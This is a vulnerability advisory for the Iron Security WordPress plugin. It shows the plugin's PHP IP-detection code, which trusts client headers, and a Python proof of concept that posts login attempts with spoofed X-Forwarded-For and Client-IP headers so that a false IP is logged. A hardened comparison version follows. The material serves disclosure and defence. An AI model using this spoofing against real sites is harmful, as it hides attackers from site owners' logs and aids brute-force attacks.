# Wordpress Plugin Iron Security - IP Spoofing
# Exploit Author: bRpsd | cy[at]live.no
# Date: March 20, 2025
# Product: https://wordpress.org/plugins/iron-security/
# Version: 2.2.3 and below
# CVE : N/A

Summary:
Iron Security is the ultimate WordPress security plugin built to secure and harden your website with essential protection features. Whether you’re a blogger, business owner, or developer, Iron Security helps keep your site safe from attacks and unauthorized access. With a user-friendly interface and effective tools such as a custom login URL and HTTP security headers, Iron Security is the all-in-one solution for WordPress security.


The plugin logs successful and failed login attempts, along with other user actions, into a log table in the database; the logged data includes the client IP. However, the logic used to determine that IP is weak, so the original IP can be hidden and a spoofed one logged instead.

PHP function logic:
==========================================================================================
private static function get_client_ip() {
    $ip = '0.0.0.0';
    
    // Check for shared internet/ISP IP
    if (!empty($_SERVER['HTTP_CLIENT_IP']) && self::validate_ip($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    }
    // Check for IPs passing through proxies
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // Check if multiple IPs
        $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        foreach ($ips as $ip_address) {
            $ip_address = trim($ip_address);
            if (self::validate_ip($ip_address)) {
                $ip = $ip_address;
                break;
            }
        }
    }
    // Check for the remote address
    elseif (!empty($_SERVER['REMOTE_ADDR']) && self::validate_ip($_SERVER['REMOTE_ADDR'])) {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    
    return $ip;
}
==========================================================================================


Risk:
The plugin retrieves client IP addresses from potentially untrusted headers such as X-Forwarded-For and Client-IP, allowing an attacker to control the value. This may be used to hide the source of malicious traffic. Below is a simple Python example that performs a failed login attempt with a spoofed IP; the spoofed address is what gets logged in the database and system, due to insufficient IP address validation and the use of user-supplied HTTP headers as the primary method of IP retrieval.




=======
POC
=======

import requests

# Target URL for login [can be other functions that get logged as well]
url = "http://localhost/wordpress/wp-login.php"

# Spoofed IP address
spoofed_ip = "1.1.1.1"

# In this example we used a failed login, in a real scenario a brute force logic can be here
username = "test"
password = "test"

# Headers with spoofed IP
headers = {
    "User-Agent": "Mozilla/5.0",
    "X-Forwarded-For": spoofed_ip,
    "Client-IP": spoofed_ip
}

# Login data
data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1"
}

# Send the login request
response = requests.post(url, headers=headers, data=data)

# Check the response
print("Status Code:", response.status_code)
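For comparison, the following is an added example (not part of this advisory or the plugin) that mirrors the plugin's get_client_ip() logic in Python beside a hardened version: headers are only honoured when REMOTE_ADDR belongs to a configured trusted proxy, and X-Forwarded-For is then walked from the right, stopping at the first hop that is not a trusted proxy. The request dict, the 203.0.113.7 client and the 10.0.0.0/8 proxy range are constructed sample values.

```python
import ipaddress

# Constructed sample request, shaped like PHP's $_SERVER, as the PoC above would
# produce when the WordPress host is reached directly (no reverse proxy in front).
SPOOFED_REQUEST = {
    "REMOTE_ADDR": "203.0.113.7",        # TCP peer: the real client
    "HTTP_CLIENT_IP": "1.1.1.1",         # attacker-controlled header
    "HTTP_X_FORWARDED_FOR": "1.1.1.1",   # attacker-controlled header
}

def _valid(ip):
    """True if ip parses as an IPv4/IPv6 address (stand-in for validate_ip)."""
    try:
        ipaddress.ip_address(ip.strip())
        return True
    except ValueError:
        return False

def weak_client_ip(server):
    """Mirror of the plugin's get_client_ip(): client headers win over REMOTE_ADDR."""
    if _valid(server.get("HTTP_CLIENT_IP", "")):
        return server["HTTP_CLIENT_IP"]
    for hop in server.get("HTTP_X_FORWARDED_FOR", "").split(","):
        if _valid(hop):
            return hop.strip()
    if _valid(server.get("REMOTE_ADDR", "")):
        return server["REMOTE_ADDR"]
    return "0.0.0.0"

def hardened_client_ip(server, trusted_proxies=()):
    """Trust only REMOTE_ADDR unless it is a configured proxy; then take the
    right-most X-Forwarded-For hop that is not itself a trusted proxy."""
    peer = server.get("REMOTE_ADDR", "")
    if not _valid(peer):
        return "0.0.0.0"
    nets = [ipaddress.ip_network(p) for p in trusted_proxies]
    def trusted(ip):
        return any(ipaddress.ip_address(ip) in n for n in nets)
    if not trusted(peer):
        return peer                      # direct connection: headers are ignored
    hops = [h.strip() for h in server.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _valid(hop):
            return peer                  # malformed chain: fall back to the peer
        if not trusted(hop):
            return hop
    return peer                          # every hop was one of our own proxies
```

With SPOOFED_REQUEST the weak logic logs 1.1.1.1 while the hardened one logs 203.0.113.7; the same spoofed header is likewise ignored behind a trusted proxy, because the walk starts from the proxy-appended hop.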